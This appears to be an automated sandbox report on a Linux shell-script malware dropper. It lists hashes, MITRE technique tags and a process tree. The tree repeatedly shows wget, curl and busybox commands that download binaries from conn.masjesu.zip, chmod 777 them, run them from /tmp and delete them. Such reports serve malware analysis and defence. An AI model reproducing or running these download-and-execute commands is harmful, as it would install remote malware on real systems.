d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374

General

Target

d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374.sh
Size

10KB
MD5

270866c69345a640bdce4a90f85e3b15
SHA1

c7cfe722aff43d909a51f45bd9f65101e526b1d2
SHA256

d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374
SHA512

4c1edec9fde9d014df3adfa52d06bcc615d0029e3ffbc1685e50004ace4d94a67dbcd0ee88e35d9d338581d4f0f2ad79deee6ac663ee0cb77d039e19fcf610c9
SSDEEP

192:u8FUMkZJMMvOJ8lpHzIJxheMMvO80HzIJx5Ux:u8FZmJMMvOJ8l9MMvO8pO

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
887	chmod
910	chmod
964	chmod
894	chmod
972	chmod
988	chmod
735	chmod
742	chmod
761	chmod
838	chmod
879	chmod
1011	chmod
795	chmod
1018	chmod
956	chmod
980	chmod
819	chmod
917	chmod
933	chmod
949	chmod
925	chmod
862	chmod
996	chmod
1004	chmod
809	chmod
871	chmod
902	chmod
941	chmod

Executes dropped EXE 28 IoCs

Processes:

IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEsX7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGameUaCVONIwD2kPO0UftouJpzEC9IaOhtKJzoHjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8lXv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX0AUIrkabDiBXKRxx6A855rzwcpfvqephPUh2ekxkemHtCtZcC4gYVjwZSiBE3g2294hbNlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvuWzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPtgO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eSwxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MMIXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4uXv97HtQNohUBDy2tLDZ50dX4llWiiOkuUXHjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8lWzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPtgO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu0AUIrkabDiBXKRxx6A855rzwcpfvqephPUh2ekxkemHtCtZcC4gYVjwZSiBE3g2294hbNlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvuIXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eSwxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MMUaCVONIwD2kPO0UftouJpzEC9IaOhtKJzoIY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEsX7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

wgetwgetbusyboxcurlwgetwgetbusyboxbusyboxwgetwgetcurlcurlbusyboxwgetcurlbusyboxbusyboxwgetbusyboxbusyboxbusyboxbusyboxcurlwgetcurlwgetwgetwgetcurlbusyboxwgetcurlwgetcurlcurlwgetbusyboxcurlbusyboxwgetbusyboxcurlbusyboxcurlbusyboxcurlwgetbusyboxbusyboxbusyboxcurlcurlcurlbusyboxcurlwgetcurlbusyboxwgetcurlwgetcurlbusyboxbusybox

pid	process
746	wget
1014	wget
755	busybox
852	curl
875	wget
906	wget
924	busybox
963	busybox
713	wget
960	wget
985	curl
824	curl
916	busybox
812	wget
813	curl
818	busybox
870	busybox
890	wget
893	busybox
1017	busybox
733	busybox
741	busybox
914	curl
945	wget
977	curl
984	wget
1007	wget
801	wget
868	curl
878	busybox
921	wget
969	curl
992	wget
1001	curl
876	curl
883	wget
901	busybox
993	curl
886	busybox
898	wget
932	busybox
946	curl
948	busybox
961	curl
979	busybox
747	curl
767	wget
858	busybox
940	busybox
1003	busybox
1015	curl
1008	curl
739	curl
808	busybox
891	curl
929	wget
953	curl
987	busybox
1000	wget
725	curl
738	wget
776	curl
995	busybox
788	busybox

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u	curl
File opened for modification	/tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu	curl
File opened for modification	/tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7	curl
File opened for modification	/tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu	curl
File opened for modification	/tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM	curl
File opened for modification	/tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU	curl
File opened for modification	/tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS	curl
File opened for modification	/tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7	curl
File opened for modification	/tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs	curl
File opened for modification	/tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo	curl
File opened for modification	/tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb	curl
File opened for modification	/tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame	curl
File opened for modification	/tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb	curl
File opened for modification	/tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM	curl
File opened for modification	/tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu	curl
File opened for modification	/tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l	curl
File opened for modification	/tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu	curl
File opened for modification	/tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS	curl
File opened for modification	/tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u	curl
File opened for modification	/tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame	curl
File opened for modification	/tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX	curl
File opened for modification	/tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU	curl
File opened for modification	/tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt	curl
File opened for modification	/tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX	curl
File opened for modification	/tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l	curl
File opened for modification	/tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt	curl
File opened for modification	/tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo	curl
File opened for modification	/tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs	curl

/tmp/d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374.sh
/tmp/d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374.sh
1⤵
PID:703

/bin/rm
/bin/rm bins.sh
2⤵
PID:706

/usr/bin/wget
wget http://conn.masjesu.zip/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
2⤵
- System Network Configuration Discovery
PID:713

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:725

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
2⤵
- System Network Configuration Discovery
PID:733

/bin/chmod
chmod 777 IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
2⤵
- File and Directory Permissions Modification
PID:735

/tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
./IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
2⤵
- Executes dropped EXE
PID:736

/bin/rm
rm IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
2⤵
PID:737

/usr/bin/wget
wget http://conn.masjesu.zip/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
2⤵
- System Network Configuration Discovery
PID:738

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:739

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
2⤵
- System Network Configuration Discovery
PID:741

/bin/chmod
chmod 777 WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
2⤵
- File and Directory Permissions Modification
PID:742

/tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
./WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
2⤵
- Executes dropped EXE
PID:743

/bin/rm
rm WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
2⤵
PID:745

/usr/bin/wget
wget http://conn.masjesu.zip/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
2⤵
- System Network Configuration Discovery
PID:746

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:747

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
2⤵
- System Network Configuration Discovery
PID:755

/bin/chmod
chmod 777 X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
2⤵
- File and Directory Permissions Modification
PID:761

/tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
./X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
2⤵
- Executes dropped EXE
PID:763

/bin/rm
rm X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
2⤵
PID:766

/usr/bin/wget
wget http://conn.masjesu.zip/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
2⤵
- System Network Configuration Discovery
PID:767

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:776

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
2⤵
- System Network Configuration Discovery
PID:788

/bin/chmod
chmod 777 UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
2⤵
- File and Directory Permissions Modification
PID:795

/tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
./UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
2⤵
- Executes dropped EXE
PID:797

/bin/rm
rm UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
2⤵
PID:800

/usr/bin/wget
wget http://conn.masjesu.zip/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
2⤵
- System Network Configuration Discovery
PID:801

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:806

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
2⤵
- System Network Configuration Discovery
PID:808

/bin/chmod
chmod 777 Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
2⤵
- File and Directory Permissions Modification
PID:809

/tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
./Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
2⤵
- Executes dropped EXE
PID:810

/bin/rm
rm Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
2⤵
PID:811

/usr/bin/wget
wget http://conn.masjesu.zip/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
2⤵
- System Network Configuration Discovery
PID:812

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:813

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
2⤵
- System Network Configuration Discovery
PID:818

/bin/chmod
chmod 777 Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
2⤵
- File and Directory Permissions Modification
PID:819

/tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
./Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
2⤵
- Executes dropped EXE
PID:820

/bin/rm
rm Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
2⤵
PID:821

/usr/bin/wget
wget http://conn.masjesu.zip/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
2⤵
PID:822

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:824

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
2⤵
PID:831

/bin/chmod
chmod 777 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
2⤵
- File and Directory Permissions Modification
PID:838

/tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
./0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
2⤵
- Executes dropped EXE
PID:839

/bin/rm
rm 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
2⤵
PID:842

/usr/bin/wget
wget http://conn.masjesu.zip/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
2⤵
PID:843

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:852

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
2⤵
- System Network Configuration Discovery
PID:858

/bin/chmod
chmod 777 h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
2⤵
- File and Directory Permissions Modification
PID:862

/tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
./h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
2⤵
- Executes dropped EXE
PID:864

/bin/rm
rm h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
2⤵
PID:866

/usr/bin/wget
wget http://conn.masjesu.zip/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
2⤵
PID:867

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:868

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
2⤵
- System Network Configuration Discovery
PID:870

/bin/chmod
chmod 777 NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
2⤵
- File and Directory Permissions Modification
PID:871

/tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
./NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
2⤵
- Executes dropped EXE
PID:872

/bin/rm
rm NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
2⤵
PID:874

/usr/bin/wget
wget http://conn.masjesu.zip/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
2⤵
- System Network Configuration Discovery
PID:875

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:876

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
2⤵
- System Network Configuration Discovery
PID:878

/bin/chmod
chmod 777 WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
2⤵
- File and Directory Permissions Modification
PID:879

/tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
./WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
2⤵
- Executes dropped EXE
PID:880

/bin/rm
rm WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
2⤵
PID:882

/usr/bin/wget
wget http://conn.masjesu.zip/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
2⤵
- System Network Configuration Discovery
PID:883

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
2⤵
- System Network Configuration Discovery
PID:886

/bin/chmod
chmod 777 gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
2⤵
- File and Directory Permissions Modification
PID:887

/tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
./gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
2⤵
- Executes dropped EXE
PID:888

/bin/rm
rm gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
2⤵
PID:889

/usr/bin/wget
wget http://conn.masjesu.zip/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
2⤵
- System Network Configuration Discovery
PID:890

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:891

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
2⤵
- System Network Configuration Discovery
PID:893

/bin/chmod
chmod 777 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
2⤵
- File and Directory Permissions Modification
PID:894

/tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
./32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
2⤵
- Executes dropped EXE
PID:895

/bin/rm
rm 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
2⤵
PID:897

/usr/bin/wget
wget http://conn.masjesu.zip/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
2⤵
- System Network Configuration Discovery
PID:898

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
2⤵
- System Network Configuration Discovery
PID:901

/bin/chmod
chmod 777 wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
2⤵
- File and Directory Permissions Modification
PID:902

/tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
./wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
2⤵
- Executes dropped EXE
PID:903

/bin/rm
rm wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
2⤵
PID:905

/usr/bin/wget
wget http://conn.masjesu.zip/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
2⤵
- System Network Configuration Discovery
PID:906

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
2⤵
PID:909

/bin/chmod
chmod 777 IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
2⤵
- File and Directory Permissions Modification
PID:910

/tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
./IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
2⤵
- Executes dropped EXE
PID:911

/bin/rm
rm IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
2⤵
PID:912

/usr/bin/wget
wget http://conn.masjesu.zip/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
2⤵
PID:913

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:914

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
2⤵
- System Network Configuration Discovery
PID:916

/bin/chmod
chmod 777 Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
2⤵
- File and Directory Permissions Modification
PID:917

/tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
./Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
2⤵
- Executes dropped EXE
PID:918

/bin/rm
rm Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
2⤵
PID:920

/usr/bin/wget
wget http://conn.masjesu.zip/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
2⤵
- System Network Configuration Discovery
PID:921

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
2⤵
- System Network Configuration Discovery
PID:924

/bin/chmod
chmod 777 Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
2⤵
- File and Directory Permissions Modification
PID:925

/tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
./Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
2⤵
- Executes dropped EXE
PID:926

/bin/rm
rm Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
2⤵
PID:928

/usr/bin/wget
wget http://conn.masjesu.zip/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
2⤵
- System Network Configuration Discovery
PID:929

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
2⤵
- System Network Configuration Discovery
PID:932

/bin/chmod
chmod 777 WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
2⤵
- File and Directory Permissions Modification
PID:933

/tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
./WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
2⤵
- Executes dropped EXE
PID:934

/bin/rm
rm WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
2⤵
PID:936

/usr/bin/wget
wget http://conn.masjesu.zip/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
2⤵
PID:937

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
2⤵
- System Network Configuration Discovery
PID:940

/bin/chmod
chmod 777 gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
2⤵
- File and Directory Permissions Modification
PID:941

/tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
./gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
2⤵
- Executes dropped EXE
PID:942

/bin/rm
rm gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
2⤵
PID:944

/usr/bin/wget
wget http://conn.masjesu.zip/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
2⤵
- System Network Configuration Discovery
PID:945

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:946

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
2⤵
- System Network Configuration Discovery
PID:948

/bin/chmod
chmod 777 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
2⤵
- File and Directory Permissions Modification
PID:949

/tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
./0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
2⤵
- Executes dropped EXE
PID:950

/bin/rm
rm 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
2⤵
PID:951

/usr/bin/wget
wget http://conn.masjesu.zip/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
2⤵
PID:952

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:953

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
2⤵
PID:955

/bin/chmod
chmod 777 h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
2⤵
- File and Directory Permissions Modification
PID:956

/tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
./h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
2⤵
- Executes dropped EXE
PID:957

/bin/rm
rm h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
2⤵
PID:959

/usr/bin/wget
wget http://conn.masjesu.zip/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
2⤵
- System Network Configuration Discovery
PID:960

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:961

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
2⤵
- System Network Configuration Discovery
PID:963

/bin/chmod
